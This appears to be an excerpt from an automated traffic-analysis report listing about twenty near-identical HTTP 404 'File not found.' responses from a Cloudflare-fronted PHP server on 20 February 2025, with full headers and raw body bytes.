            Source: global trafficHTTP traffic detected: HTTP/1.1 404 Not FoundDate: Thu, 20 Feb 2025 15:17:43 GMTContent-Type: text/html; charset=UTF-8Connection: closeX-Powered-By: PHP/5.4.16Status: 404 Not Foundcf-cache-status: DYNAMICvary: accept-encodingReport-To: {"endpoints":[{"url":"https:\/\/a.nel.cloudflare.com\/report\/v4?s=1Osio%2FpGGbI5I%2Fhwv2mUbmeBlkpx4MpPkDWDp3MbouR6gyQZSYiJV4Q1Ulq%2Fd4MBPVS7ugmsbPlyYZ0e6M4WhQGyE2%2FOy2ARmO%2FItpr2X4lA7hxN5IxArC%2Fqi7w%3D"}],"group":"cf-nel","max_age":604800}NEL: {"success_fraction":0,"report_to":"cf-nel","max_age":604800}Server: cloudflareCF-RAY: 914f770f3ecc430a-EWRalt-svc: h3=":443"; ma=86400server-timing: cfL4;desc="?proto=TCP&rtt=1619&min_rtt=1619&rtt_var=809&sent=1&recv=3&lost=0&retrans=0&sent_bytes=0&recv_bytes=391&delivery_rate=0&cwnd=232&unsent_bytes=0&cid=0000000000000000&ts=0&x=0"Data Raw: 08 00 00 00 00 00 00 00 46 69 6c 65 20 6e 6f 74 20 66 6f 75 6e 64 2e Data Ascii: File not found.
            Source: global trafficHTTP traffic detected: HTTP/1.1 404 Not FoundDate: Thu, 20 Feb 2025 15:17:44 GMTContent-Type: text/html; charset=UTF-8Connection: closeX-Powered-By: PHP/5.4.16Status: 404 Not Foundcf-cache-status: DYNAMICvary: accept-encodingReport-To: {"endpoints":[{"url":"https:\/\/a.nel.cloudflare.com\/report\/v4?s=Zio%2BUQIMwOEzg4RmH1%2Frq2fTKZLEXeUQoCQc6ynZ0RC5Ujd24b0lS6cUFlEiqPumsTunuy%2Fns96oa7vZ7n0CqaZpBe66c5v9CFJ1K5IXQE28rn9D3YnJ4M0F%2BxY%3D"}],"group":"cf-nel","max_age":604800}NEL: {"success_fraction":0,"report_to":"cf-nel","max_age":604800}Server: cloudflareCF-RAY: 914f77151a14423b-EWRalt-svc: h3=":443"; ma=86400server-timing: cfL4;desc="?proto=TCP&rtt=1766&min_rtt=1766&rtt_var=883&sent=1&recv=3&lost=0&retrans=0&sent_bytes=0&recv_bytes=391&delivery_rate=0&cwnd=229&unsent_bytes=0&cid=0000000000000000&ts=0&x=0"Data Raw: 08 00 00 00 00 00 00 00 46 69 6c 65 20 6e 6f 74 20 66 6f 75 6e 64 2e Data Ascii: File not found.
            Source: global trafficHTTP traffic detected: HTTP/1.1 404 Not FoundDate: Thu, 20 Feb 2025 15:17:45 GMTContent-Type: text/html; charset=UTF-8Connection: closeX-Powered-By: PHP/5.4.16Status: 404 Not Foundcf-cache-status: DYNAMICvary: accept-encodingReport-To: {"endpoints":[{"url":"https:\/\/a.nel.cloudflare.com\/report\/v4?s=a8TDJw0gpopWko67YyUCLQjqZO21wsgfeO%2B3Y8%2B8I8naQSSeDU9Yvbe%2FjwsxZ7X3u0xTuC0lEEUsurwON6nfnGoyh5YTnfZEc6URvMwE8xASly0Y4iq8R7brIrE%3D"}],"group":"cf-nel","max_age":604800}NEL: {"success_fraction":0,"report_to":"cf-nel","max_age":604800}Server: cloudflareCF-RAY: 914f771a299e0c92-EWRalt-svc: h3=":443"; ma=86400server-timing: cfL4;desc="?proto=TCP&rtt=1542&min_rtt=1542&rtt_var=771&sent=1&recv=3&lost=0&retrans=0&sent_bytes=0&recv_bytes=391&delivery_rate=0&cwnd=183&unsent_bytes=0&cid=0000000000000000&ts=0&x=0"Data Raw: 08 00 00 00 00 00 00 00 46 69 6c 65 20 6e 6f 74 20 66 6f 75 6e 64 2e Data Ascii: File not found.
            Source: global trafficHTTP traffic detected: HTTP/1.1 404 Not FoundDate: Thu, 20 Feb 2025 15:17:46 GMTContent-Type: text/html; charset=UTF-8Connection: closeX-Powered-By: PHP/5.4.16Status: 404 Not Foundcf-cache-status: DYNAMICvary: accept-encodingReport-To: {"endpoints":[{"url":"https:\/\/a.nel.cloudflare.com\/report\/v4?s=yhnbcAAyqYbjGEm7GgNX5iN8g63MzlQeh567T5FozQiK1h%2FmNev0TmKiWIpoC%2BT3IuSgjyDsyIMayydyYcGuHm4A%2BBNw2%2BkgTX4BwTp%2B23xhpCL5pX%2BRUyA9Q%2BU%3D"}],"group":"cf-nel","max_age":604800}NEL: {"success_fraction":0,"report_to":"cf-nel","max_age":604800}Server: cloudflareCF-RAY: 914f7725e8654233-EWRalt-svc: h3=":443"; ma=86400server-timing: cfL4;desc="?proto=TCP&rtt=1753&min_rtt=1753&rtt_var=876&sent=1&recv=3&lost=0&retrans=0&sent_bytes=0&recv_bytes=391&delivery_rate=0&cwnd=217&unsent_bytes=0&cid=0000000000000000&ts=0&x=0"Data Raw: 08 00 00 00 00 00 00 00 46 69 6c 65 20 6e 6f 74 20 66 6f 75 6e 64 2e Data Ascii: File not found.
            Source: global trafficHTTP traffic detected: HTTP/1.1 404 Not FoundDate: Thu, 20 Feb 2025 15:17:47 GMTContent-Type: text/html; charset=UTF-8Connection: closeX-Powered-By: PHP/5.4.16Status: 404 Not Foundcf-cache-status: DYNAMICvary: accept-encodingReport-To: {"endpoints":[{"url":"https:\/\/a.nel.cloudflare.com\/report\/v4?s=bhx0MwNqxX2oFTjJ5JQCkFiSQlkyynloVZU%2BNrvM7fX4QvSGMOuvjqxatlY8mcMAy3LFg2D8%2ByaRa9yoSqYaOJgFVmRQXVzgnsDqXK%2BgqDOVhUD2zDXITgnMA84%3D"}],"group":"cf-nel","max_age":604800}NEL: {"success_fraction":0,"report_to":"cf-nel","max_age":604800}Server: cloudflareCF-RAY: 914f772bf8485e7c-EWRalt-svc: h3=":443"; ma=86400server-timing: cfL4;desc="?proto=TCP&rtt=1630&min_rtt=1630&rtt_var=815&sent=1&recv=3&lost=0&retrans=0&sent_bytes=0&recv_bytes=391&delivery_rate=0&cwnd=209&unsent_bytes=0&cid=0000000000000000&ts=0&x=0"Data Raw: 08 00 00 00 00 00 00 00 46 69 6c 65 20 6e 6f 74 20 66 6f 75 6e 64 2e Data Ascii: File not found.
            Source: global trafficHTTP traffic detected: HTTP/1.1 404 Not FoundDate: Thu, 20 Feb 2025 15:17:48 GMTContent-Type: text/html; charset=UTF-8Connection: closeX-Powered-By: PHP/5.4.16Status: 404 Not Foundcf-cache-status: DYNAMICvary: accept-encodingReport-To: {"endpoints":[{"url":"https:\/\/a.nel.cloudflare.com\/report\/v4?s=NTtOY6Xt421WIHRx%2BwjtOZ8vk9zgEMGB7uKxBIX3Un%2B8iQfOPoMA4hItUF8OWHhvIgepN%2FmnYfH6mZno%2BcKJtICdNPraRrDA8CwkL13VA17DWTMCx6zF8FS9fEw%3D"}],"group":"cf-nel","max_age":604800}NEL: {"success_fraction":0,"report_to":"cf-nel","max_age":604800}Server: cloudflareCF-RAY: 914f77310b6e0c7a-EWRalt-svc: h3=":443"; ma=86400server-timing: cfL4;desc="?proto=TCP&rtt=1515&min_rtt=1515&rtt_var=757&sent=1&recv=3&lost=0&retrans=0&sent_bytes=0&recv_bytes=391&delivery_rate=0&cwnd=203&unsent_bytes=0&cid=0000000000000000&ts=0&x=0"Data Raw: 08 00 00 00 00 00 00 00 46 69 6c 65 20 6e 6f 74 20 66 6f 75 6e 64 2e Data Ascii: File not found.
            Source: global trafficHTTP traffic detected: HTTP/1.1 404 Not FoundDate: Thu, 20 Feb 2025 15:17:50 GMTContent-Type: text/html; charset=UTF-8Connection: closeX-Powered-By: PHP/5.4.16Status: 404 Not Foundcf-cache-status: DYNAMICvary: accept-encodingReport-To: {"endpoints":[{"url":"https:\/\/a.nel.cloudflare.com\/report\/v4?s=T8ilztDBpMlVSdT6z3L108w8%2BPzN0JYYc26EE0%2BWVbMDfV5ZCcSi%2Fnmy56X6lKAVHAjtp6aqPO9uakZtAVjN5Iw1bS8WhDE4BpcHhFcTMWm27twK5oYFty6Aip0%3D"}],"group":"cf-nel","max_age":604800}NEL: {"success_fraction":0,"report_to":"cf-nel","max_age":604800}Server: cloudflareCF-RAY: 914f773cfa825e82-EWRalt-svc: h3=":443"; ma=86400server-timing: cfL4;desc="?proto=TCP&rtt=1708&min_rtt=1708&rtt_var=854&sent=1&recv=3&lost=0&retrans=0&sent_bytes=0&recv_bytes=391&delivery_rate=0&cwnd=206&unsent_bytes=0&cid=0000000000000000&ts=0&x=0"Data Raw: 08 00 00 00 00 00 00 00 46 69 6c 65 20 6e 6f 74 20 66 6f 75 6e 64 2e Data Ascii: File not found.
            Source: global trafficHTTP traffic detected: HTTP/1.1 404 Not FoundDate: Thu, 20 Feb 2025 15:17:51 GMTContent-Type: text/html; charset=UTF-8Connection: closeX-Powered-By: PHP/5.4.16Status: 404 Not Foundcf-cache-status: DYNAMICvary: accept-encodingReport-To: {"endpoints":[{"url":"https:\/\/a.nel.cloudflare.com\/report\/v4?s=aD0ZYU15lyCnr2r1Iv8UR05EBDyeiCfhprSyUAuGkUvAmZbVTsXM94dRUykh56Mp9QX%2FK6%2BCrwcNQ0YU1loDRQrS06GX%2FZL6G%2FQku7oXPRObDTqz3YAj9Kv9vrk%3D"}],"group":"cf-nel","max_age":604800}NEL: {"success_fraction":0,"report_to":"cf-nel","max_age":604800}Server: cloudflareCF-RAY: 914f774309e44363-EWRalt-svc: h3=":443"; ma=86400server-timing: cfL4;desc="?proto=TCP&rtt=1595&min_rtt=1595&rtt_var=797&sent=1&recv=3&lost=0&retrans=0&sent_bytes=0&recv_bytes=391&delivery_rate=0&cwnd=240&unsent_bytes=0&cid=0000000000000000&ts=0&x=0"Data Raw: 08 00 00 00 00 00 00 00 46 69 6c 65 20 6e 6f 74 20 66 6f 75 6e 64 2e Data Ascii: File not found.
            Source: global trafficHTTP traffic detected: HTTP/1.1 404 Not FoundDate: Thu, 20 Feb 2025 15:17:52 GMTContent-Type: text/html; charset=UTF-8Connection: closeX-Powered-By: PHP/5.4.16Status: 404 Not Foundcf-cache-status: DYNAMICvary: accept-encodingReport-To: {"endpoints":[{"url":"https:\/\/a.nel.cloudflare.com\/report\/v4?s=K31AYfiGEQ9N6c6VgVeFpShBHLKaK7E3bDtVIyLLtqGyY7SzJvD%2BQq%2FH5C9sruKyEVBOSWkl4vhmXTx0UHhZ99JWpgRwbhqVK8w2C5AGZr%2Be%2BKGwsW%2BMkNCQx2o%3D"}],"group":"cf-nel","max_age":604800}NEL: {"success_fraction":0,"report_to":"cf-nel","max_age":604800}Server: cloudflareCF-RAY: 914f77480e077cf4-EWRalt-svc: h3=":443"; ma=86400server-timing: cfL4;desc="?proto=TCP&rtt=1941&min_rtt=1941&rtt_var=970&sent=1&recv=3&lost=0&retrans=0&sent_bytes=0&recv_bytes=391&delivery_rate=0&cwnd=227&unsent_bytes=0&cid=0000000000000000&ts=0&x=0"Data Raw: 08 00 00 00 00 00 00 00 46 69 6c 65 20 6e 6f 74 20 66 6f 75 6e 64 2e Data Ascii: File not found.
            Source: global trafficHTTP traffic detected: HTTP/1.1 404 Not FoundDate: Thu, 20 Feb 2025 15:17:53 GMTContent-Type: text/html; charset=UTF-8Connection: closeX-Powered-By: PHP/5.4.16Status: 404 Not Foundcf-cache-status: DYNAMICvary: accept-encodingReport-To: {"endpoints":[{"url":"https:\/\/a.nel.cloudflare.com\/report\/v4?s=6bFiaaqTzzEj29lTwEB9XEJ9HAYY9TaNCsOVEdcrtZEKpbghlWWPXPxX8cuh5YA3MiREDaerCM5gbzpcINDX2o5aDJ3JXCIrGH2kgvDjy1NjKMJ7uLZlhWHmYwg%3D"}],"group":"cf-nel","max_age":604800}NEL: {"success_fraction":0,"report_to":"cf-nel","max_age":604800}Server: cloudflareCF-RAY: 914f774e3b134390-EWRalt-svc: h3=":443"; ma=86400server-timing: cfL4;desc="?proto=TCP&rtt=1536&min_rtt=1536&rtt_var=768&sent=1&recv=3&lost=0&retrans=0&sent_bytes=0&recv_bytes=391&delivery_rate=0&cwnd=244&unsent_bytes=0&cid=0000000000000000&ts=0&x=0"Data Raw: 08 00 00 00 00 00 00 00 46 69 6c 65 20 6e 6f 74 20 66 6f 75 6e 64 2e Data Ascii: File not found.
            Source: global trafficHTTP traffic detected: HTTP/1.1 404 Not FoundDate: Thu, 20 Feb 2025 15:17:54 GMTContent-Type: text/html; charset=UTF-8Connection: closeX-Powered-By: PHP/5.4.16Status: 404 Not Foundcf-cache-status: DYNAMICvary: accept-encodingReport-To: {"endpoints":[{"url":"https:\/\/a.nel.cloudflare.com\/report\/v4?s=cASFKeRMHLwr8auDucRbsS2KLMhuLgL792576BiHR8oitVbz2Fii%2BswtQzno8Q4CQ%2Fy19rO%2FaYoAuetVFSP7qRkGWGjfmZdy7lXhgtuCxRg1SkqMPTkB%2BzUHL64%3D"}],"group":"cf-nel","max_age":604800}NEL: {"success_fraction":0,"report_to":"cf-nel","max_age":604800}Server: cloudflareCF-RAY: 914f77544a1f8c48-EWRalt-svc: h3=":443"; ma=86400server-timing: cfL4;desc="?proto=TCP&rtt=1840&min_rtt=1840&rtt_var=920&sent=1&recv=3&lost=0&retrans=0&sent_bytes=0&recv_bytes=391&delivery_rate=0&cwnd=217&unsent_bytes=0&cid=0000000000000000&ts=0&x=0"Data Raw: 08 00 00 00 00 00 00 00 46 69 6c 65 20 6e 6f 74 20 66 6f 75 6e 64 2e Data Ascii: File not found.
            Source: global trafficHTTP traffic detected: HTTP/1.1 404 Not FoundDate: Thu, 20 Feb 2025 15:17:55 GMTContent-Type: text/html; charset=UTF-8Connection: closeX-Powered-By: PHP/5.4.16Status: 404 Not Foundcf-cache-status: DYNAMICvary: accept-encodingReport-To: {"endpoints":[{"url":"https:\/\/a.nel.cloudflare.com\/report\/v4?s=MaV77PDteHkRCN%2FZ8y7UPum5UG2fLRyeCq3Av%2FfTvItxfufvnxDcCqHJuWnXe7Zautr%2B%2FWMpfwXNyzfv%2B9spG3PIU6SScjEuKCDUAug5g%2F41dD%2FmNq3EQmxYX8w%3D"}],"group":"cf-nel","max_age":604800}NEL: {"success_fraction":0,"report_to":"cf-nel","max_age":604800}Server: cloudflareCF-RAY: 914f775a8d9a4265-EWRalt-svc: h3=":443"; ma=86400server-timing: cfL4;desc="?proto=TCP&rtt=1730&min_rtt=1730&rtt_var=865&sent=1&recv=3&lost=0&retrans=0&sent_bytes=0&recv_bytes=391&delivery_rate=0&cwnd=204&unsent_bytes=0&cid=0000000000000000&ts=0&x=0"Data Raw: 08 00 00 00 00 00 00 00 46 69 6c 65 20 6e 6f 74 20 66 6f 75 6e 64 2e Data Ascii: File not found.
            Source: global trafficHTTP traffic detected: HTTP/1.1 404 Not FoundDate: Thu, 20 Feb 2025 15:17:56 GMTContent-Type: text/html; charset=UTF-8Connection: closeX-Powered-By: PHP/5.4.16Status: 404 Not Foundcf-cache-status: DYNAMICvary: accept-encodingReport-To: {"endpoints":[{"url":"https:\/\/a.nel.cloudflare.com\/report\/v4?s=fTaZlxsV6K411FYeo%2FeqdhBlQDdJVmLPFjTN4rb4SlSyNQSTNicmBePn6eqDVZksbUPKfF8Rb%2BcJmAn%2BKzNc6nxM8WGrQ6vFCvCZIHH9cyKE5h3Q%2F2HZ39ZM2yc%3D"}],"group":"cf-nel","max_age":604800}NEL: {"success_fraction":0,"report_to":"cf-nel","max_age":604800}Server: cloudflareCF-RAY: 914f775f9d97430a-EWRalt-svc: h3=":443"; ma=86400server-timing: cfL4;desc="?proto=TCP&rtt=2345&min_rtt=2345&rtt_var=1172&sent=1&recv=3&lost=0&retrans=0&sent_bytes=0&recv_bytes=391&delivery_rate=0&cwnd=232&unsent_bytes=0&cid=0000000000000000&ts=0&x=0"Data Raw: 08 00 00 00 00 00 00 00 46 69 6c 65 20 6e 6f 74 20 66 6f 75 6e 64 2e Data Ascii: File not found.
            Source: global trafficHTTP traffic detected: HTTP/1.1 404 Not FoundDate: Thu, 20 Feb 2025 15:17:56 GMTContent-Type: text/html; charset=UTF-8Connection: closeX-Powered-By: PHP/5.4.16Status: 404 Not Foundcf-cache-status: DYNAMICvary: accept-encodingReport-To: {"endpoints":[{"url":"https:\/\/a.nel.cloudflare.com\/report\/v4?s=OtfRa4u7fsHpGBWYbb%2F%2BpBjxvPNC4AaNwj7FOQA%2Fh3QMoXD7GSRoC2cey1XIpk%2Fw09FmS8Z2%2Fb1Mc4OruVh6gbI2qQTuwlCZZZsh%2BvXFEgjRj44QBu0rKzM7hS0%3D"}],"group":"cf-nel","max_age":604800}NEL: {"success_fraction":0,"report_to":"cf-nel","max_age":604800}Server: cloudflareCF-RAY: 914f77659ff10f41-EWRalt-svc: h3=":443"; ma=86400server-timing: cfL4;desc="?proto=TCP&rtt=1501&min_rtt=1501&rtt_var=750&sent=1&recv=3&lost=0&retrans=0&sent_bytes=0&recv_bytes=391&delivery_rate=0&cwnd=154&unsent_bytes=0&cid=0000000000000000&ts=0&x=0"Data Raw: 08 00 00 00 00 00 00 00 46 69 6c 65 20 6e 6f 74 20 66 6f 75 6e 64 2e Data Ascii: File not found.
            Source: global trafficHTTP traffic detected: HTTP/1.1 404 Not FoundDate: Thu, 20 Feb 2025 15:17:57 GMTContent-Type: text/html; charset=UTF-8Connection: closeX-Powered-By: PHP/5.4.16Status: 404 Not Foundcf-cache-status: DYNAMICvary: accept-encodingReport-To: {"endpoints":[{"url":"https:\/\/a.nel.cloudflare.com\/report\/v4?s=RN%2F0TJgG%2FlPBgGepykEQaufQAyFAZmtvKfqK%2BUP2lrKPpLSL9ZyxLg30mYW67rJxagsHceite5bJSWbYS%2BfzG1BEPW8R0YGVmSIhTBSiLx14eZpeA30aXO5VSVs%3D"}],"group":"cf-nel","max_age":604800}NEL: {"success_fraction":0,"report_to":"cf-nel","max_age":604800}Server: cloudflareCF-RAY: 914f776acb1f7ce2-EWRalt-svc: h3=":443"; ma=86400server-timing: cfL4;desc="?proto=TCP&rtt=1959&min_rtt=1959&rtt_var=979&sent=1&recv=3&lost=0&retrans=0&sent_bytes=0&recv_bytes=391&delivery_rate=0&cwnd=239&unsent_bytes=0&cid=0000000000000000&ts=0&x=0"Data Raw: 08 00 00 00 00 00 00 00 46 69 6c 65 20 6e 6f 74 20 66 6f 75 6e 64 2e Data Ascii: File not found.
            Source: global trafficHTTP traffic detected: HTTP/1.1 404 Not FoundDate: Thu, 20 Feb 2025 15:17:58 GMTContent-Type: text/html; charset=UTF-8Connection: closeX-Powered-By: PHP/5.4.16Status: 404 Not Foundcf-cache-status: DYNAMICvary: accept-encodingReport-To: {"endpoints":[{"url":"https:\/\/a.nel.cloudflare.com\/report\/v4?s=xfjpHXX2wdwxg6a4iLPIGUNTFWTV0dAijiU4wpKiQkBRi%2BKKLYl309yorJghXXXs29tgHvWZ3cwi0o5GjAW%2FHVPlkZbv9BDN%2BGAL7YKA%2BO%2BCCjdJDqUBFPNFLwg%3D"}],"group":"cf-nel","max_age":604800}NEL: {"success_fraction":0,"report_to":"cf-nel","max_age":604800}Server: cloudflareCF-RAY: 914f7770dc7c42ac-EWRalt-svc: h3=":443"; ma=86400server-timing: cfL4;desc="?proto=TCP&rtt=1640&min_rtt=1640&rtt_var=820&sent=1&recv=3&lost=0&retrans=0&sent_bytes=0&recv_bytes=391&delivery_rate=0&cwnd=223&unsent_bytes=0&cid=0000000000000000&ts=0&x=0"Data Raw: 08 00 00 00 00 00 00 00 46 69 6c 65 20 6e 6f 74 20 66 6f 75 6e 64 2e Data Ascii: File not found.
            Source: global trafficHTTP traffic detected: HTTP/1.1 404 Not FoundDate: Thu, 20 Feb 2025 15:17:59 GMTContent-Type: text/html; charset=UTF-8Connection: closeX-Powered-By: PHP/5.4.16Status: 404 Not Foundcf-cache-status: DYNAMICvary: accept-encodingReport-To: {"endpoints":[{"url":"https:\/\/a.nel.cloudflare.com\/report\/v4?s=pPv1lGG4VwFp9ANebdwhoWhKsWt973swNBaQFBAtIQkD31nWOB%2BpLZR5p5R61hzXLiX1BpN4UiwLAVQLqZ9UjCZ3Q73g10X%2BJSo%2B6iIM0LP7sYCkmHGnLGRtm1o%3D"}],"group":"cf-nel","max_age":604800}NEL: {"success_fraction":0,"report_to":"cf-nel","max_age":604800}Server: cloudflareCF-RAY: 914f7775ea6e43aa-EWRalt-svc: h3=":443"; ma=86400server-timing: cfL4;desc="?proto=TCP&rtt=1586&min_rtt=1586&rtt_var=793&sent=1&recv=3&lost=0&retrans=0&sent_bytes=0&recv_bytes=391&delivery_rate=0&cwnd=240&unsent_bytes=0&cid=0000000000000000&ts=0&x=0"Data Raw: 08 00 00 00 00 00 00 00 46 69 6c 65 20 6e 6f 74 20 66 6f 75 6e 64 2e Data Ascii: File not found.
            Source: global trafficHTTP traffic detected: HTTP/1.1 404 Not FoundDate: Thu, 20 Feb 2025 15:18:00 GMTContent-Type: text/html; charset=UTF-8Connection: closeX-Powered-By: PHP/5.4.16Status: 404 Not Foundcf-cache-status: DYNAMICvary: accept-encodingReport-To: {"endpoints":[{"url":"https:\/\/a.nel.cloudflare.com\/report\/v4?s=mzaWVr%2BRnzW%2Bj93nbJcN85PKUk5YEifhmUSq1Okj6zrJtQtfDbbg2qQW2jccUytbcuvYyWrNDioK9vbSyYtJzt7%2FO5wPy%2FcLMlrAyXemOPy7pP2SOxVs8hv3lvA%3D"}],"group":"cf-nel","max_age":604800}NEL: {"success_fraction":0,"report_to":"cf-nel","max_age":604800}Server: cloudflareCF-RAY: 914f777c08ad1a24-EWRalt-svc: h3=":443"; ma=86400server-timing: cfL4;desc="?proto=TCP&rtt=1939&min_rtt=1939&rtt_var=969&sent=1&recv=3&lost=0&retrans=0&sent_bytes=0&recv_bytes=391&delivery_rate=0&cwnd=222&unsent_bytes=0&cid=0000000000000000&ts=0&x=0"Data Raw: 08 00 00 00 00 00 00 00 46 69 6c 65 20 6e 6f 74 20 66 6f 75 6e 64 2e Data Ascii: File not found.
            Source: global trafficHTTP traffic detected: HTTP/1.1 404 Not FoundDate: Thu, 20 Feb 2025 15:18:01 GMTContent-Type: text/html; charset=UTF-8Connection: closeX-Powered-By: PHP/5.4.16Status: 404 Not Foundcf-cache-status: DYNAMICvary: accept-encodingReport-To: {"endpoints":[{"url":"https:\/\/a.nel.cloudflare.com\/report\/v4?s=3VeK21DJRIeobjtYAN95S6smJwrl8y%2BtaQf9hDWY4Qc4%2FUj3yt%2Fkbal7aKlCYMnTJg7EGyQdWZJ4I2zd%2B4zxYTZ9rZyp1OMyOaZgCWscqgnrq9Fa%2BFZyZJSwR%2F4%3D"}],"group":"cf-nel","max_age":604800}NEL: {"success_fraction":0,"report_to":"cf-nel","max_age":604800}Server: cloudflareCF-RAY: 914f77813da14325-EWRalt-svc: h3=":443"; ma=86400server-timing: cfL4;desc="?proto=TCP&rtt=1591&min_rtt=1591&rtt_var=795&sent=1&recv=3&lost=0&retrans=0&sent_bytes=0&recv_bytes=391&delivery_rate=0&cwnd=186&unsent_bytes=0&cid=0000000000000000&ts=0&x=0"Data Raw: 08 00 00 00 00 00 00 00 46 69 6c 65 20 6e 6f 74 20 66 6f 75 6e 64 2e Data Ascii: File not found.
            Source: global trafficHTTP traffic detected: HTTP/1.1 404 Not FoundDate: Thu, 20 Feb 2025 15:18:02 GMTContent-Type: text/html; charset=UTF-8Connection: closeX-Powered-By: PHP/5.4.16Status: 404 Not Foundcf-cache-status: DYNAMICvary: accept-encodingReport-To: {"endpoints":[{"url":"https:\/\/a.nel.cloudflare.com\/report\/v4?s=wfEPZLss0dqZgQCRnhO9TTMEJ5w28NxFsIGXdVXi7cxrCmdEQraXAwwhedoS1SUgBwnvWCkPEebFsLdM8%2FEVf3Zmaw%2FRiPibKSkG4Qabjia6DVz3oshPIeXor4Y%3D"}],"group":"cf-nel","max_age":604800}NEL: {"success_fraction":0,"report_to":"cf-nel","max_age":604800}Server: cloudflareCF-RAY: 914f7787fcdc4205-EWRalt-svc: h3=":443"; ma=86400server-timing: cfL4;desc="?proto=TCP&rtt=1738&min_rtt=1738&rtt_var=869&sent=1&recv=3&lost=0&retrans=0&sent_bytes=0&recv_bytes=391&delivery_rate=0&cwnd=250&unsent_bytes=0&cid=0000000000000000&ts=0&x=0"Data Raw: 08 00 00 00 00 00 00 00 46 69 6c 65 20 6e 6f 74 20 66 6f 75 6e 64 2e Data Ascii: File not found.
            Source: global trafficHTTP traffic detected: HTTP/1.1 404 Not FoundDate: Thu, 20 Feb 2025 15:18:03 GMTContent-Type: text/html; charset=UTF-8Connection: closeX-Powered-By: PHP/5.4.16Status: 404 Not Foundcf-cache-status: DYNAMICvary: accept-encodingReport-To: {"endpoints":[{"url":"https:\/\/a.nel.cloudflare.com\/report\/v4?s=ZzClH2UVn4JFN41zrE3h4hJupTkCt%2FPJ8ewclzTRms74rvbDeSbt5W%2BggzxX784TYuimbAYerZ8FDYTy1Bjn0jWeYEUzPdmMVa4inxCLL9oJcYTKz4b6NXH1sfI%3D"}],"group":"cf-nel","max_age":604800}NEL: {"success_fraction":0,"report_to":"cf-nel","max_age":604800}Server: cloudflareCF-RAY: 914f778d6db34216-EWRalt-svc: h3=":443"; ma=86400server-timing: cfL4;desc="?proto=TCP&rtt=1995&min_rtt=1995&rtt_var=997&sent=1&recv=3&lost=0&retrans=0&sent_bytes=0&recv_bytes=391&delivery_rate=0&cwnd=248&unsent_bytes=0&cid=0000000000000000&ts=0&x=0"Data Raw: 08 00 00 00 00 00 00 00 46 69 6c 65 20 6e 6f 74 20 66 6f 75 6e 64 2e Data Ascii: File not found.
            Source: global trafficHTTP traffic detected: HTTP/1.1 404 Not FoundDate: Thu, 20 Feb 2025 15:18:04 GMTContent-Type: text/html; charset=UTF-8Connection: closeX-Powered-By: PHP/5.4.16Status: 404 Not Foundcf-cache-status: DYNAMICvary: accept-encodingReport-To: {"endpoints":[{"url":"https:\/\/a.nel.cloudflare.com\/report\/v4?s=iFiwRVnR8Ec4kFesFpuvDIZJzDDxNzOCcaE6s4S2XE7L1311%2BOi%2Fm%2BuqkfYHqkkTD5MbenS7fOb50tR63WJMKIPjK5En5x4DuexiKTllU2TwBXR8AbAv9fRpzPc%3D"}],"group":"cf-nel","max_age":604800}NEL: {"success_fraction":0,"report_to":"cf-nel","max_age":604800}Server: cloudflareCF-RAY: 914f7792abfb3300-EWRalt-svc: h3=":443"; ma=86400server-timing: cfL4;desc="?proto=TCP&rtt=1982&min_rtt=1982&rtt_var=991&sent=1&recv=3&lost=0&retrans=0&sent_bytes=0&recv_bytes=391&delivery_rate=0&cwnd=237&unsent_bytes=0&cid=0000000000000000&ts=0&x=0"Data Raw: 08 00 00 00 00 00 00 00 46 69 6c 65 20 6e 6f 74 20 66 6f 75 6e 64 2e Data Ascii: File not found.
            Source: global trafficHTTP traffic detected: HTTP/1.1 404 Not FoundDate: Thu, 20 Feb 2025 15:18:06 GMTContent-Type: text/html; charset=UTF-8Connection: closeX-Powered-By: PHP/5.4.16Status: 404 Not Foundcf-cache-status: DYNAMICvary: accept-encodingReport-To: {"endpoints":[{"url":"https:\/\/a.nel.cloudflare.com\/report\/v4?s=%2Bz%2FR4lBYqp0MUv4PI1aqIVOixz1hVfyWxrvgiaa1d%2F%2BKLCGB%2FpT5UEIfhu3%2BusAuMtKyd6rs4BlMG2Qy2qOl4bS%2FyifJm%2FTX%2FCu8I054ChQDM3liGoBIODu70nk%3D"}],"group":"cf-nel","max_age":604800}NEL: {"success_fraction":0,"report_to":"cf-nel","max_age":604800}Server: cloudflareCF-RAY: 914f779eab74ef9f-EWRalt-svc: h3=":443"; ma=86400server-timing: cfL4;desc="?proto=TCP&rtt=2016&min_rtt=2016&rtt_var=1008&sent=1&recv=3&lost=0&retrans=0&sent_bytes=0&recv_bytes=391&delivery_rate=0&cwnd=239&unsent_bytes=0&cid=0000000000000000&ts=0&x=0"Data Raw: 08 00 00 00 00 00 00 00 46 69 6c 65 20 6e 6f 74 20 66 6f 75 6e 64 2e Data Ascii: File not found.
            Source: global trafficHTTP traffic detected: HTTP/1.1 404 Not FoundDate: Thu, 20 Feb 2025 15:18:07 GMTContent-Type: text/html; charset=UTF-8Connection: closeX-Powered-By: PHP/5.4.16Status: 404 Not Foundcf-cache-status: DYNAMICvary: accept-encodingReport-To: {"endpoints":[{"url":"https:\/\/a.nel.cloudflare.com\/report\/v4?s=zWzt%2Bp%2FS1JZ%2F8hz1qjrbHTyKjyKa935CErSOBA3ipgYKdiu8lviPpj2fF6sv%2Fzf3ymvwuFTm%2FdQdVPtlfi%2BKKEyxMDyotFSSIWedNexz8tW8T7aOxUxzaK%2BFp4k%3D"}],"group":"cf-nel","max_age":604800}NEL: {"success_fraction":0,"report_to":"cf-nel","max_age":604800}Server: cloudflareCF-RAY: 914f77a4aedc8c09-EWRalt-svc: h3=":443"; ma=86400server-timing: cfL4;desc="?proto=TCP&rtt=2499&min_rtt=2499&rtt_var=1249&sent=1&recv=3&lost=0&retrans=0&sent_bytes=0&recv_bytes=391&delivery_rate=0&cwnd=240&unsent_bytes=0&cid=0000000000000000&ts=0&x=0"Data Raw: 08 00 00 00 00 00 00 00 46 69 6c 65 20 6e 6f 74 20 66 6f 75 6e 64 2e Data Ascii: File not found.
